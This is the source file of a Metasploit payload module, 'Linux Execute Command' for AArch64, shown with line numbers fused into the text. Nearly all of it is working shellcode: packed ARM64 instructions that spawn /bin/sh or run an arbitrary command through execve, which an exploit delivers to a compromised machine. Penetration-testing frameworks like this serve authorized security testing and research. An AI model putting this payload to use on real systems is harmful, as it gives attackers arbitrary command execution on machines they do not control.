Path: blob/master/modules/payloads/singles/linux/aarch64/exec.rb
70341 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 6478include Msf::Payload::Single9include Msf::Payload::Linux::Aarch64::Prepends1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Execute Command',16'Description' => 'Execute an arbitrary command or just a /bin/sh shell',17'Author' => 'Spencer McIntyre',18'License' => MSF_LICENSE,19'Platform' => 'linux',20'Arch' => ARCH_AARCH6421)22)2324register_options([25OptString.new('CMD', [ false, 'The command string to execute' ]),26])27end2829def generate(_opts = {})30cmd = datastore['CMD'] || ''3132if cmd.empty?33# execve("/bin/sh", NULL, NULL)34shellcode = [350x100000a0, # adr x0, sh_str360xd2800001, # mov x1, #0370xd2800002, # mov x2, #0380xd2801ba8, # mov x8, #0xdd # __NR_execve390xd4000001 # svc #040].pack('V*')41shellcode += "/bin/sh\x00"42else43# execve("/bin/sh", ["/bin/sh", "-c", CMD, NULL], NULL)44shellcode = [450x10000160, # adr x0, sh_str460x10000189, # adr x9, c_str470x1000018a, # adr x10, cmd_str480xf90003e0, # str x0, [sp, #0] ; argv[0] = "/bin/sh"490xf90007e9, # str x9, [sp, #8] ; argv[1] = "-c"500xf9000bea, # str x10, [sp, #16] ; argv[2] = CMD510xf9000fff, # str xzr, [sp, #24] ; argv[3] = NULL520x910003e1, # mov x1, sp530xd2800002, # mov x2, #0540xd2801ba8, # mov x8, #0xdd # __NR_execve550xd4000001 # svc #056].pack('V*')57shellcode += "/bin/sh\x00"58shellcode += "-c\x00\x00"59shellcode += cmd + "\x00"60end6162# align our shellcode to 4 bytes63shellcode += "\x00" while shellcode.bytesize % 4 != 06465super.to_s + shellcode66end67end686970